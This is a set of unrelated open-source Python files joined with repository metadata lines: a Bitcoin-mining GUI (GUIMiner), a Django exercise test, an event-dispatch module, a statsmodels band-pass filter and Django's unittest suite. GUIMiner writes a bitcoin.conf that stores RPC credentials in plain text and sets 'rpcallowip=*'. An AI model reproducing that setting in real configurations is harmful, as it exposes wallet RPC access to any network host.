self.Bind(wx.EVT_MENU, self.on_menu_exit, id=wx.ID_EXIT)
self.Bind(wx.EVT_MENU, self.set_official_client_path, id=ID_PATHS)
self.Bind(wx.EVT_MENU, self.set_blockchain_directory, id=ID_BLOCKCHAIN_PATH)
self.Bind(wx.EVT_MENU, self.show_console, id=ID_CONSOLE)
self.Bind(wx.EVT_MENU, self.show_summary, id=ID_SUMMARY)
self.Bind(wx.EVT_MENU, self.show_about_dialog, id=wx.ID_ABOUT)
self.Bind(wx.EVT_MENU, self.create_solo_password, id=ID_SOLO)
self.Bind(wx.EVT_MENU, self.launch_solo_server, id=ID_LAUNCH)
self.Bind(wx.EVT_MENU, self.on_change_language, id=ID_CHANGE_LANGUAGE)
self.Bind(wx.EVT_MENU, self.on_donate, id=ID_DONATE_SMALL)
self.Bind(wx.EVT_CLOSE, self.on_close)
self.Bind(wx.EVT_ICONIZE, self.on_iconize)
self.Bind(fnb.EVT_FLATNOTEBOOK_PAGE_CLOSING, self.on_page_closing)
self.Bind(fnb.EVT_FLATNOTEBOOK_PAGE_CLOSED, self.on_page_closed)
self.Bind(fnb.EVT_FLATNOTEBOOK_PAGE_CHANGED, self.on_page_changed)
self.load_config()
self.do_layout()
if not self.start_minimized_chk.IsChecked():
self.Show()
def on_iconize(self, event):
if event.Iconized() and sys.platform == 'win32':
self.Hide() # On minimize, hide from taskbar.
else:
self.Show()
def set_properties(self):
self.SetIcons(get_icon_bundle())
self.SetTitle(_("GUIMiner - v%s") % __version__)
self.statusbar.SetStatusWidths([-1, 125])
statusbar_fields = ["", STR_NOT_STARTED]
for i in range(len(statusbar_fields)):
self.statusbar.SetStatusText(statusbar_fields[i], i)
def do_layout(self):
self.vertical_sizer = wx.BoxSizer(wx.VERTICAL)
self.vertical_sizer.Add(self.nb, 1, wx.EXPAND, 20)
self.SetSizer(self.vertical_sizer)
self.vertical_sizer.SetSizeHints(self)
self.SetSizerAndFit(self.vertical_sizer)
self.Layout()
@property
def profile_panels(self):
"""Return a list of currently available MinerTab."""
pages = [self.nb.GetPage(i) for i in range(self.nb.GetPageCount())]
return [p for p in pages if
p != self.console_panel and p != self.summary_panel]
def add_profile(self, data={}):
"""Add a new MinerTab to the list of tabs."""
panel = MinerTab(self.nb, -1, self.devices, self.servers,
self.defaults, self.statusbar, data)
self.nb.AddPage(panel, panel.name)
# The newly created profile should have focus.
self.nb.EnsureVisible(self.nb.GetPageCount() - 1)
if self.summary_panel is not None:
self.summary_panel.add_miners_to_grid() # Show new entry on summary
return panel
def message(self, *args, **kwargs):
"""Utility method to show a message dialog and return their choice."""
dialog = wx.MessageDialog(self, *args, **kwargs)
retval = dialog.ShowModal()
dialog.Destroy()
return retval
def name_new_profile(self, event=None, extra_profile_data={}):
"""Prompt for the new miner's name."""
dialog = wx.TextEntryDialog(self, _("Name this miner:"), _("New miner"))
if dialog.ShowModal() == wx.ID_OK:
name = dialog.GetValue().strip()
if not name: name = _("Untitled")
data = extra_profile_data.copy()
data['name'] = name
self.add_profile(data)
def new_external_profile(self, event):
"""Prompt for an external miner path, then create a miner.
On Windows we validate against legal miners; on Linux they can pick
whatever they want.
"""
wildcard = _('External miner (*.exe)|*.exe|(*.py)|*.py') if sys.platform == 'win32' else '*.*'
dialog = wx.FileDialog(self,
_("Select external miner:"),
defaultDir=os.path.join(get_module_path(), 'miners'),
defaultFile="",
wildcard=wildcard,
style=wx.OPEN)
if dialog.ShowModal() != wx.ID_OK:
return
if sys.platform == 'win32' and dialog.GetFilename() not in SUPPORTED_BACKENDS:
self.message(
_("Unsupported external miner %(filename)s. Supported are: %(supported)s") % \
dict(filename=dialog.GetFilename(), supported='\n'.join(SUPPORTED_BACKENDS)),
_("Miner not supported"), wx.OK | wx.ICON_ERROR)
return
path = os.path.join(dialog.GetDirectory(), dialog.GetFilename())
dialog.Destroy()
self.name_new_profile(extra_profile_data=dict(external_path=path))
def new_phoenix_profile(self, event):
"""Create a new miner using the Phoenix OpenCL miner backend."""
path = os.path.join(get_module_path(), 'phoenix.exe')
self.name_new_profile(extra_profile_data=dict(external_path=path))
def new_cgminer_profile(self, event):
"""Create a new miner using the Cgminer OpenCL miner backend."""
path = os.path.join(get_module_path(), 'cgminer.exe')
self.name_new_profile(extra_profile_data=dict(external_path=path))
def new_ufasoft_profile(self, event):
"""Create a new miner using the Ufasoft CPU miner backend."""
path = os.path.join(get_module_path(), 'miners', 'ufasoft', 'bitcoin-miner.exe')
self.name_new_profile(extra_profile_data=dict(external_path=path))
def new_cuda_profile(self, event):
"""Create a new miner using the CUDA GPU miner backend."""
path = os.path.join(get_module_path(), 'miners', 'puddinpop', 'rpcminer-cuda.exe')
self.name_new_profile(extra_profile_data=dict(external_path=path))
def get_storage_location(self):
"""Get the folder and filename to store our JSON config."""
if sys.platform == 'win32':
folder = os.path.join(os.environ['AppData'], 'poclbm')
config_filename = os.path.join(folder, 'poclbm.ini')
else: # Assume linux? TODO test
folder = os.environ['HOME']
config_filename = os.path.join(folder, '.poclbm')
return folder, config_filename
def on_close(self, event):
"""Minimize to tray if they click "close" but exit otherwise.
On closing, stop any miners that are currently working.
"""
if event.CanVeto():
self.Hide()
event.Veto()
else:
if any(p.is_modified for p in self.profile_panels):
dialog = wx.MessageDialog(self, _('Do you want to save changes?'), _('Save'),
wx.YES_NO | wx.YES_DEFAULT | wx.ICON_QUESTION)
retval = dialog.ShowModal()
dialog.Destroy()
if retval == wx.ID_YES:
self.save_config()
if self.console_panel is not None:
self.console_panel.on_close()
if self.summary_panel is not None:
self.summary_panel.on_close()
for p in self.profile_panels:
p.on_close()
if self.tbicon is not None:
self.tbicon.RemoveIcon()
self.tbicon.timer.Stop()
self.tbicon.Destroy()
event.Skip()
def save_config(self, event=None):
"""Save the current miner profiles to our config file in JSON format."""
folder, config_filename = self.get_storage_location()
mkdir_p(folder)
profile_data = [p.get_data() for p in self.profile_panels]
config_data = dict(show_console=self.is_console_visible(),
show_summary=self.is_summary_visible(),
profiles=profile_data,
bitcoin_executable=self.bitcoin_executable,
blockchain_directory=self.blockchain_directory,
show_opencl_warning=self.do_show_opencl_warning,
start_minimized=self.start_minimized_chk.IsChecked(),
console_max_lines=self.console_max_lines,
window_position=list(self.GetRect()))
logger.debug(_('Saving: ') + json.dumps(config_data))
try:
with open(config_filename, 'w') as f:
json.dump(config_data, f, indent=4)
except IOError:
self.message(
_("Couldn't write save file %s.\nCheck the location is writable.") % config_filename,
_("Save unsuccessful"), wx.OK | wx.ICON_ERROR)
else:
self.message(_("Profiles saved OK to %s.") % config_filename,
_("Save successful"), wx.OK | wx.ICON_INFORMATION)
for p in self.profile_panels:
p.on_saved()
def parse_config(self):
"""Set self.config_data to a dictionary of config values."""
self.config_data = {}
try:
config_filename = self.get_storage_location()[1]
if os.path.exists(config_filename):
with open(config_filename) as f:
self.config_data.update(json.load(f))
logger.debug(_('Loaded: %s') % json.dumps(self.config_data))
except ValueError:
self.message(
_("Your settings saved at:\n %s\nare corrupt or could not be read.\nDeleting this file or saving over it may solve the problem." % config_filename),
_("Error"), wx.ICON_ERROR)
def load_config(self, event=None):
"""Load JSON profile info from the config file."""
self.parse_config()
config_data = self.config_data
executable = config_data.get('bitcoin_executable', None)
if executable is not None:
self.bitcoin_executable = executable
blockchain_directory = config_data.get('blockchain_directory', None)
if blockchain_directory is not None:
self.blockchain_directory = blockchain_directory
# Shut down any existing miners before they get clobbered
if(any(p.is_mining for p in self.profile_panels)):
result = self.message(
_("Loading profiles will stop any currently running miners. Continue?"),
_("Load profile"), wx.YES_NO | wx.NO_DEFAULT | wx.ICON_INFORMATION)
if result == wx.ID_NO:
return
for p in reversed(self.profile_panels):
p.on_close()
self.nb.DeletePage(self.nb.GetPageIndex(p))
# If present, summary should be the leftmost tab on startup.
if config_data.get('show_summary', False):
self.show_summary()
profile_data = config_data.get('profiles', [])
for d in profile_data:
self.add_profile(d)
if not any(profile_data):
self.add_profile() # Create a default one using defaults.ini
if config_data.get('show_console', False):
self.show_console()
window_position = config_data.get('window_position')
if window_position:
self.SetRect(window_position)
for p in self.profile_panels:
if p.autostart:
p.start_mining()
def set_official_client_path(self, event):
"""Set the path to the official Bitcoin client."""
wildcard = "*.exe" if sys.platform == 'win32' else '*.*'
dialog = wx.FileDialog(self,
_("Select path to Bitcoin.exe"),
defaultFile="bitcoin-qt.exe",
wildcard=wildcard,
style=wx.OPEN)
if dialog.ShowModal() == wx.ID_OK:
path = os.path.join(dialog.GetDirectory(), dialog.GetFilename())
if os.path.exists(path):
self.bitcoin_executable = path
dialog.Destroy()
def set_blockchain_directory(self, event):
"""Set the path to the blockchain data directory."""
defaultPath = os.path.join(os.getenv("APPDATA"), "Bitcoin")
dialog = wx.DirDialog(self,
_("Select path to blockchain"),
defaultPath=defaultPath,
style=wx.DD_DIR_MUST_EXIST)
if dialog.ShowModal() == wx.ID_OK:
path = dialog.GetPath()
if os.path.exists(path):
self.blockchain_directory = path
dialog.Destroy()
def show_about_dialog(self, event):
"""Show the 'about' dialog."""
dialog = AboutGuiminer(self, -1, _('About'))
dialog.ShowModal()
dialog.Destroy()
def on_page_closing(self, event):
"""Handle a tab closing event.
If they are closing a special panel, we have to shut it down.
If the tab has a miner running in it, we have to stop the miner
before letting the tab be removed.
"""
p = self.nb.GetPage(event.GetSelection())
if p == self.console_panel:
self.console_panel.on_close()
self.console_panel = None
event.Skip()
return
if p == self.summary_panel:
self.summary_panel.on_close()
self.summary_panel = None
event.Skip()
return
if p.is_mining:
result = self.message(
_("Closing this miner will stop it. Continue?"),
_("Close miner"),
wx.YES_NO | wx.NO_DEFAULT | wx.ICON_INFORMATION)
if result == wx.ID_NO:
event.Veto()
return
p.on_close()
event.Skip() # OK to close the tab now
def on_page_closed(self, event):
if self.summary_panel is not None:
self.summary_panel.add_miners_to_grid() # Remove miner summary
def on_page_changed(self, event):
"""Handle a tab change event.
Ensures the status bar shows the status of the tab that has focus.
"""
p = self.nb.GetPage(event.GetSelection())
p.on_focus()
def launch_solo_server(self, event):
"""Launch the official bitcoin client in server mode.
This allows poclbm to connect to it for mining solo.
"""
if self.blockchain_directory and os.path.exists(self.blockchain_directory):
datadir = " -datadir=\"%s\"" % self.blockchain_directory
else:
datadir = ""
try:
subprocess.Popen(self.bitcoin_executable + " -server" + datadir)
except OSError:
self.message(
_("Couldn't find Bitcoin at %s. Is your path set correctly?") % self.bitcoin_executable,
_("Launch failed"), wx.ICON_ERROR | wx.OK)
return
self.message(
_("The Bitcoin client will now launch in server mode.\nOnce it connects to the network and downloads the block chain, you can start a miner in 'solo' mode."),
_("Launched ok."),
wx.OK)
def create_solo_password(self, event):
"""Prompt the user for login credentials to the bitcoin client.
These are required to connect to the client over JSON-RPC and are
stored in 'bitcoin.conf'.
"""
if sys.platform == 'win32':
filename = os.path.join(os.getenv("APPDATA"), "Bitcoin", "bitcoin.conf")
else: # Assume Linux for now TODO test
filename = os.path.join(os.getenv('HOME'), ".bitcoin")
if os.path.exists(filename):
result = self.message(
_("%s already exists. Overwrite?") % filename,
_("bitcoin.conf already exists."),
wx.YES_NO | wx.NO_DEFAULT | wx.ICON_INFORMATION)
if result == wx.ID_NO:
return
dialog = SoloPasswordRequest(self, _('Enter password'))
result = dialog.ShowModal()
dialog.Destroy()
if result == wx.ID_CANCEL:
return
with open(filename, "w") as f:
f.write('\nrpcuser=%s\nrpcpassword=%s\nrpcallowip=*' % dialog.get_value())
f.close()
self.message(_("Wrote bitcoin config ok."), _("Success"), wx.OK)
def is_console_visible(self):
"""Return True if the console is visible."""
return self.nb.GetPageIndex(self.console_panel) != -1
def show_console(self, event=None):
"""Show the console log in its own tab."""
if self.is_console_visible():
return # Console already shown
self.console_panel = ConsolePanel(self, self.console_max_lines)
self.nb.AddPage(self.console_panel, _("Console"))
self.nb.EnsureVisible(self.nb.GetPageCount() - 1)
def is_summary_visible(self):
"""Return True if the summary is visible."""
return self.nb.GetPageIndex(self.summary_panel) != -1
def show_summary(self, event=None):
"""Show the summary window in its own tab."""
if self.is_summary_visible():
return
self.summary_panel = SummaryPanel(self)
self.nb.AddPage(self.summary_panel, _("Summary"))
index = self.nb.GetPageIndex(self.summary_panel)
self.nb.SetSelection(index)
def on_menu_exit(self, event):
self.Close(force=True)
def rename_miner(self, event):
"""Change the name of a miner as displayed on the tab."""
p = self.nb.GetPage(self.nb.GetSelection())
if p not in self.profile_panels:
return
dialog = wx.TextEntryDialog(self, _("Rename to:"), _("Rename miner"))
if dialog.ShowModal() == wx.ID_OK:
p.set_name(dialog.GetValue().strip())
def duplicate_miner(self, event):
"""Duplicate the current miner to another miner."""
p = self.nb.GetPage(self.nb.GetSelection())
if p not in self.profile_panels:
return
self.name_new_profile(event=None, extra_profile_data=p.get_data())
def on_change_language(self, event):
dialog = ChangeLanguageDialog(self, _('Change language'), language)
result = dialog.ShowModal()
dialog.Destroy()
if result == wx.ID_CANCEL:
return
language_name = dialog.get_value()
update_language(LANGUAGES[language_name])
save_language()
def on_donate(self, event):
dialog = DonateDialog(self, -1, _('Donate'))
dialog.ShowModal()
dialog.Destroy()
class DonateDialog(wx.Dialog):
"""About dialog for the app with a donation address."""
DONATE_TEXT = "If this software helped you, please consider contributing to its development." \
"\nSend donations to: %(address)s"
def __init__(self, parent, id, title):
wx.Dialog.__init__(self, parent, id, title)
vbox = wx.BoxSizer(wx.VERTICAL)
text = DonateDialog.DONATE_TEXT % dict(address=DONATION_ADDRESS)
self.about_text = wx.StaticText(self, -1, text)
self.copy_btn = wx.Button(self, -1, _("Copy address to clipboard"))
vbox.Add(self.about_text, 0, wx.ALL, 10)
vbox.Add(self.copy_btn, 0, wx.ALL | wx.ALIGN_CENTER_HORIZONTAL, 10)
self.SetSizerAndFit(vbox)
self.copy_btn.Bind(wx.EVT_BUTTON, self.on_copy)
def on_copy(self, event):
"""Copy the donation address to the clipboard."""
if wx.TheClipboard.Open():
data = wx.TextDataObject()
data.SetText(DONATION_ADDRESS)
wx.TheClipboard.SetData(data)
wx.TheClipboard.Close()
class ChangeLanguageDialog(wx.Dialog):
"""Dialog prompting the user to change languages."""
def __init__(self, parent, title, current_language):
style = wx.DEFAULT_DIALOG_STYLE
vbox = wx.BoxSizer(wx.VERTICAL)
wx.Dialog.__init__(self, parent, -1, title, style=style)
self.lbl = wx.StaticText(self, -1,
_("Choose language (requires restart to take full effect)"))
vbox.Add(self.lbl, 0, wx.ALL, 10)
self.language_choices = wx.ComboBox(self, -1,
choices=sorted(LANGUAGES.keys()),
style=wx.CB_READONLY)
self.language_choices.SetStringSelection(LANGUAGES_REVERSE[current_language])
vbox.Add(self.language_choices, 0, wx.ALL, 10)
buttons = self.CreateButtonSizer(wx.OK | wx.CANCEL)
vbox.Add(buttons, 0, wx.ALL | wx.ALIGN_CENTER_HORIZONTAL, 10)
self.SetSizerAndFit(vbox)
def get_value(self):
return self.language_choices.GetStringSelection()
class SoloPasswordRequest(wx.Dialog):
"""Dialog prompting user for login credentials for solo mining."""
def __init__(self, parent, title):
style = wx.DEFAULT_DIALOG_STYLE
vbox = wx.BoxSizer(wx.VERTICAL)
wx.Dialog.__init__(self, parent, -1, title, style=style)
self.user_lbl = wx.StaticText(self, -1, STR_USERNAME)
self.txt_username = wx.TextCtrl(self, -1, "")
self.pass_lbl = wx.StaticText(self, -1, STR_PASSWORD)
self.txt_pass = wx.TextCtrl(self, -1, "", style=wx.TE_PASSWORD)
grid_sizer_1 = wx.FlexGridSizer(2, 2, 5, 5)
grid_sizer_1.Add(self.user_lbl, 0, wx.ALIGN_RIGHT | wx.ALIGN_CENTER_VERTICAL, 0)
grid_sizer_1.Add(self.txt_username, 0, wx.EXPAND, 0)
grid_sizer_1.Add(self.pass_lbl, 0, wx.ALIGN_RIGHT | wx.ALIGN_CENTER_VERTICAL, 0)
grid_sizer_1.Add(self.txt_pass, 0, wx.EXPAND, 0)
buttons = self.CreateButtonSizer(wx.OK | wx.CANCEL)
vbox.Add(grid_sizer_1, wx.EXPAND | wx.ALL, 10)
vbox.Add(buttons)
self.SetSizerAndFit(vbox)
def get_value(self):
"""Return the (username, password) supplied by the user."""
return self.txt_username.GetValue(), self.txt_pass.GetValue()
class BalanceAuthRequest(wx.Dialog):
"""Dialog prompting user for an auth token to refresh their balance."""
instructions = \
_("""Click the link below to log in to the pool and get a special token.
This token lets you securely check your balance.
To remember this token for the future, save your miner settings.""")
def __init__(self, parent, url):
style = wx.DEFAULT_DIALOG_STYLE
vbox = wx.BoxSizer(wx.VERTICAL)
wx.Dialog.__init__(self, parent, -1, STR_REFRESH_BALANCE, style=style)
self.instructions = wx.StaticText(self, -1, BalanceAuthRequest.instructions)
self.website = hyperlink.HyperLinkCtrl(self, -1, url)
self.txt_token = wx.TextCtrl(self, -1, _("(Paste token here)"))
buttons = self.CreateButtonSizer(wx.OK | wx.CANCEL)
vbox.AddMany([
(self.instructions, 0, wx.ALL, 10),
(self.website, 0, wx.ALL | wx.ALIGN_CENTER_HORIZONTAL, 10),
(self.txt_token, 0, wx.EXPAND | wx.ALIGN_CENTER_HORIZONTAL, 10),
(buttons, 0, wx.ALL | wx.ALIGN_CENTER_HORIZONTAL, 10)
])
self.SetSizerAndFit(vbox)
def get_value(self):
"""Return the auth token supplied by the user."""
return self.txt_token.GetValue()
class AboutGuiminer(wx.Dialog):
"""About dialog for the app with a donation address."""
def __init__(self, parent, id, title):
wx.Dialog.__init__(self, parent, id, title)
vbox = wx.BoxSizer(wx.VERTICAL)
text = ABOUT_TEXT % dict(version=__version__,
address=DONATION_ADDRESS)
self.about_text = wx.StaticText(self, -1, text)
self.copy_btn = wx.Button(self, -1, _("Copy address to clipboard"))
vbox.Add(self.about_text)
vbox.Add(self.copy_btn, 0, wx.ALIGN_BOTTOM | wx.ALIGN_CENTER_HORIZONTAL, 0)
self.SetSizerAndFit(vbox)
self.copy_btn.Bind(wx.EVT_BUTTON, self.on_copy)
def on_copy(self, event):
"""Copy the donation address to the clipboard."""
if wx.TheClipboard.Open():
data = wx.TextDataObject()
data.SetText(DONATION_ADDRESS)
wx.TheClipboard.SetData(data)
wx.TheClipboard.Close()
class OpenCLWarningDialog(wx.Dialog):
"""Warning dialog when a user does not have OpenCL installed."""
def __init__(self, parent):
wx.Dialog.__init__(self, parent, -1, _("No OpenCL devices found."))
vbox = wx.BoxSizer(wx.VERTICAL)
self.message = wx.StaticText(self, -1,
_("""No OpenCL devices were found.
If you only want to mine using CPU or CUDA, you can ignore this message.
If you want to mine on ATI graphics cards, you may need to install the ATI Stream
SDK, or your GPU may not support OpenCL."""))
vbox.Add(self.message, 0, wx.ALL, 10)
hbox = wx.BoxSizer(wx.HORIZONTAL)
self.no_show_chk = wx.CheckBox(self, -1)
hbox.Add(self.no_show_chk)
self.no_show_txt = wx.StaticText(self, -1, _("Don't show this message again"))
hbox.Add((5, 0))
hbox.Add(self.no_show_txt)
vbox.Add(hbox, 0, wx.ALL, 10)
buttons = self.CreateButtonSizer(wx.OK)
vbox.Add(buttons, 0, wx.ALIGN_BOTTOM | wx.ALIGN_CENTER_HORIZONTAL, 0)
self.SetSizerAndFit(vbox)
def is_box_checked(self):
return self.no_show_chk.GetValue()
def run():
try:
frame_1 = GUIMiner(None, -1, "")
app.SetTopWindow(frame_1)
app.MainLoop()
except:
logging.exception("Exception:")
raise
if __name__ == "__main__":
run()
| gpl-3.0 | 6,675,025,466,027,185,000 | 39.738641 | 187 | 0.587888 | false |
Datastreamx/learn-english | learn_english/exercises/test_gerund.py | 1 | 1703 | from django.test import TestCase
from . import models
from django.test import Client
#Alle antwoorden worden al lowercase opgeslagen
class GerundTestCase(TestCase):
def setUp(self):
self.client = Client()
models.OpenQuestion.objects.create(category="CC" , question="This is a test question rush b", answer="cyka")
models.OpenQuestion.objects.create(category="CC" , question="This is also a test question", answer="noway")
models.FilledOpenQuestion.objects.create(category="CC", question="This is a test question rush b", answer="cyka")
models.FilledOpenQuestion.objects.create(username="ct", question="This is also a test question", answer="watu")
def test_store_questions(self):
"""Test relevant models"""
test_question = models.OpenQuestion.objects.get(question="This is a test question rush b")
filled_test_question = models.FilledOpenQuestion.objects.get(question="This is a test question rush b")
self.assertEqual(test_question.question, "This is a test question rush b")
self.assertNotEqual(test_question.question, "bar")
self.assertNotEqual(filled_test_question.username, "CT")
def test_render_questions_A1(self):
"""Test question rendering"""
response = self.client.get('/gerund/A1')
content = response.content
self.assertTrue("My friend is good ... playing volleyball." in str(content))
def test_answer_submission_A1(self):
"""Test submission of answers A1"""
self.client.post('/gerund/A1', {'username': 'rare', '1': 'foo', '2': 'bar'})
query = models.FilledOpenQuestion.objects.filter(username='rare')
self.assertNotEqual(0, query.count())
| gpl-3.0 | 5,080,968,972,346,919,000 | 47.657143 | 116 | 0.698767 | false |
Alphadelta14/python-newdispatch | dispatch/events/event.py | 1 | 2415 |
class EventException(BaseException):
pass
class EventCancelled(EventException):
def __init__(self, evt):
EventException.__init__(self)
self.evt = evt
class EventDeferred(EventException):
pass
class EventData(object):
"""Object passed into emitted events
Attributes
----------
name : str
Name of event
source : Emitter
Source of event
data : object
Data passed in
cancelled : bool
Whether this event should continue to propagate.
Use Event.cancel() to cancel an event
errors : list
List of exceptions this event has encountered
success : Bool
Whether this event has successfully executed
deferred : Bool
If True, this is the second time this function is called
Methods
-------
cancel
Cancel this event if cancellable
"""
def __init__(self, name, source, data=None, cancellable=True):
self.name = name
self.source = source
self.data = data
self.cancelled = False
self.cancellable = cancellable
self.errors = []
self.deferred = False
def cancel(self):
"""Cancel this event if possible
This halts the active callback
"""
if self.cancellable:
self.cancelled = True
raise EventCancelled(self)
def defer(self):
"""Call the current callback again later.
This will cause all lines before the defer to run again, so please
use at the start of the file.
Examples
--------
>>> emitter = Emitter()
>>> @emitter.on('some_event')
def my_func1(evt):
evt.defer()
print('Callback #1 called!')
>>> @emitter.on('some_event')
def my_func2(evt):
print('Callback #2 called!')
>>> emitter.fire('some_event')
Callback #2 called!
Callback #1 called!
"""
if not self.deferred:
raise EventDeferred
def add_error(self, err):
"""Adds an error to the list of errors this event came across
Parameters
----------
err : Exception
"""
self.errors.append(err)
@property
def success(self):
"""Whether or not this event has successfully executed"""
return not self.cancelled and not self.errors
| mit | 7,276,609,863,622,575,000 | 24.15625 | 74 | 0.5706 | false |
bsipocz/statsmodels | statsmodels/tsa/filters/cf_filter.py | 28 | 3435 | from statsmodels.compat.python import range
import numpy as np
from ._utils import _maybe_get_pandas_wrapper
# the data is sampled quarterly, so cut-off frequency of 18
# Wn is normalized cut-off freq
#Cutoff frequency is that frequency where the magnitude response of the filter
# is sqrt(1/2.). For butter, the normalized cutoff frequency Wn must be a
# number between 0 and 1, where 1 corresponds to the Nyquist frequency, p
# radians per sample.
#NOTE: uses a loop, could probably be sped-up for very large datasets
def cffilter(X, low=6, high=32, drift=True):
"""
Christiano Fitzgerald asymmetric, random walk filter
Parameters
----------
X : array-like
1 or 2d array to filter. If 2d, variables are assumed to be in columns.
low : float
Minimum period of oscillations. Features below low periodicity are
filtered out. Default is 6 for quarterly data, giving a 1.5 year
periodicity.
high : float
Maximum period of oscillations. Features above high periodicity are
filtered out. Default is 32 for quarterly data, giving an 8 year
periodicity.
drift : bool
Whether or not to remove a trend from the data. The trend is estimated
as np.arange(nobs)*(X[-1] - X[0])/(len(X)-1)
Returns
-------
cycle : array
The features of `X` between periodicities given by low and high
trend : array
The trend in the data with the cycles removed.
Examples
--------
>>> import statsmodels.api as sm
>>> import pandas as pd
>>> dta = sm.datasets.macrodata.load_pandas().data
>>> dates = sm.tsa.datetools.dates_from_range('1959Q1', '2009Q3')
>>> index = pd.DatetimeIndex(dates)
>>> dta.set_index(index, inplace=True)
>>> cf_cycles, cf_trend = sm.tsa.filters.cffilter(dta[["infl", "unemp"]])
>>> import matplotlib.pyplot as plt
>>> fig, ax = plt.subplots()
>>> cf_cycles.plot(ax=ax, style=['r--', 'b-'])
>>> plt.show()
.. plot:: plots/cff_plot.py
"""
#TODO: cythonize/vectorize loop?, add ability for symmetric filter,
# and estimates of theta other than random walk.
if low < 2:
raise ValueError("low must be >= 2")
_pandas_wrapper = _maybe_get_pandas_wrapper(X)
X = np.asanyarray(X)
if X.ndim == 1:
X = X[:,None]
nobs, nseries = X.shape
a = 2*np.pi/high
b = 2*np.pi/low
if drift: # get drift adjusted series
X = X - np.arange(nobs)[:,None]*(X[-1] - X[0])/(nobs-1)
J = np.arange(1,nobs+1)
Bj = (np.sin(b*J)-np.sin(a*J))/(np.pi*J)
B0 = (b-a)/np.pi
Bj = np.r_[B0,Bj][:,None]
y = np.zeros((nobs,nseries))
for i in range(nobs):
B = -.5*Bj[0] -np.sum(Bj[1:-i-2])
A = -Bj[0] - np.sum(Bj[1:-i-2]) - np.sum(Bj[1:i]) - B
y[i] = Bj[0] * X[i] + np.dot(Bj[1:-i-2].T,X[i+1:-1]) + B*X[-1] + \
np.dot(Bj[1:i].T, X[1:i][::-1]) + A*X[0]
y = y.squeeze()
cycle, trend = y, X.squeeze()-y
if _pandas_wrapper is not None:
return _pandas_wrapper(cycle), _pandas_wrapper(trend)
return cycle, trend
if __name__ == "__main__":
import statsmodels as sm
dta = sm.datasets.macrodata.load().data[['infl','tbilrate']].view((float,2))[1:]
cycle, trend = cffilter(dta, 6, 32, drift=True)
dta = sm.datasets.macrodata.load().data['tbilrate'][1:]
cycle2, trend2 = cffilter(dta, 6, 32, drift=True)
| bsd-3-clause | 5,811,148,767,338,814,000 | 32.676471 | 84 | 0.607278 | false |
rimbalinux/LMD3 | django/utils/unittest/suite.py | 12 | 9580 | """TestSuite"""
import sys
import unittest
from django.utils.unittest import case, util
__unittest = True
class BaseTestSuite(unittest.TestSuite):
"""A simple test suite that doesn't provide class or module shared fixtures.
"""
def __init__(self, tests=()):
self._tests = []
self.addTests(tests)
def __repr__(self):
return "<%s tests=%s>" % (util.strclass(self.__class__), list(self))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return NotImplemented
return list(self) == list(other)
def __ne__(self, other):
return not self == other
# Can't guarantee hash invariant, so flag as unhashable
__hash__ = None
def __iter__(self):
return iter(self._tests)
def countTestCases(self):
cases = 0
for test in self:
cases += test.countTestCases()
return cases
def addTest(self, test):
# sanity checks
if not hasattr(test, '__call__'):
raise TypeError("%r is not callable" % (repr(test),))
if isinstance(test, type) and issubclass(test,
(case.TestCase, TestSuite)):
raise TypeError("TestCases and TestSuites must be instantiated "
"before passing them to addTest()")
self._tests.append(test)
def addTests(self, tests):
if isinstance(tests, basestring):
raise TypeError("tests must be an iterable of tests, not a string")
for test in tests:
self.addTest(test)
def run(self, result):
for test in self:
if result.shouldStop:
break
test(result)
return result
def __call__(self, *args, **kwds):
return self.run(*args, **kwds)
def debug(self):
"""Run the tests without collecting errors in a TestResult"""
for test in self:
test.debug()
class TestSuite(BaseTestSuite):
"""A test suite is a composite test consisting of a number of TestCases.
For use, create an instance of TestSuite, then add test case instances.
When all tests have been added, the suite can be passed to a test
runner, such as TextTestRunner. It will run the individual test cases
in the order in which they were added, aggregating the results. When
subclassing, do not forget to call the base class constructor.
"""
def run(self, result):
self._wrapped_run(result)
self._tearDownPreviousClass(None, result)
self._handleModuleTearDown(result)
return result
def debug(self):
"""Run the tests without collecting errors in a TestResult"""
debug = _DebugResult()
self._wrapped_run(debug, True)
self._tearDownPreviousClass(None, debug)
self._handleModuleTearDown(debug)
################################
# private methods
def _wrapped_run(self, result, debug=False):
for test in self:
if result.shouldStop:
break
if _isnotsuite(test):
self._tearDownPreviousClass(test, result)
self._handleModuleFixture(test, result)
self._handleClassSetUp(test, result)
result._previousTestClass = test.__class__
if (getattr(test.__class__, '_classSetupFailed', False) or
getattr(result, '_moduleSetUpFailed', False)):
continue
if hasattr(test, '_wrapped_run'):
test._wrapped_run(result, debug)
elif not debug:
test(result)
else:
test.debug()
def _handleClassSetUp(self, test, result):
previousClass = getattr(result, '_previousTestClass', None)
currentClass = test.__class__
if currentClass == previousClass:
return
if result._moduleSetUpFailed:
return
if getattr(currentClass, "__unittest_skip__", False):
return
try:
currentClass._classSetupFailed = False
except TypeError:
# test may actually be a function
# so its class will be a builtin-type
pass
setUpClass = getattr(currentClass, 'setUpClass', None)
if setUpClass is not None:
try:
setUpClass()
except Exception, e:
if isinstance(result, _DebugResult):
raise
currentClass._classSetupFailed = True
className = util.strclass(currentClass)
errorName = 'setUpClass (%s)' % className
self._addClassOrModuleLevelException(result, e, errorName)
def _get_previous_module(self, result):
previousModule = None
previousClass = getattr(result, '_previousTestClass', None)
if previousClass is not None:
previousModule = previousClass.__module__
return previousModule
def _handleModuleFixture(self, test, result):
previousModule = self._get_previous_module(result)
currentModule = test.__class__.__module__
if currentModule == previousModule:
return
self._handleModuleTearDown(result)
result._moduleSetUpFailed = False
try:
module = sys.modules[currentModule]
except KeyError:
return
setUpModule = getattr(module, 'setUpModule', None)
if setUpModule is not None:
try:
setUpModule()
except Exception, e:
if isinstance(result, _DebugResult):
raise
result._moduleSetUpFailed = True
errorName = 'setUpModule (%s)' % currentModule
self._addClassOrModuleLevelException(result, e, errorName)
def _addClassOrModuleLevelException(self, result, exception, errorName):
error = _ErrorHolder(errorName)
addSkip = getattr(result, 'addSkip', None)
if addSkip is not None and isinstance(exception, case.SkipTest):
addSkip(error, str(exception))
else:
result.addError(error, sys.exc_info())
def _handleModuleTearDown(self, result):
previousModule = self._get_previous_module(result)
if previousModule is None:
return
if result._moduleSetUpFailed:
return
try:
module = sys.modules[previousModule]
except KeyError:
return
tearDownModule = getattr(module, 'tearDownModule', None)
if tearDownModule is not None:
try:
tearDownModule()
except Exception, e:
if isinstance(result, _DebugResult):
raise
errorName = 'tearDownModule (%s)' % previousModule
self._addClassOrModuleLevelException(result, e, errorName)
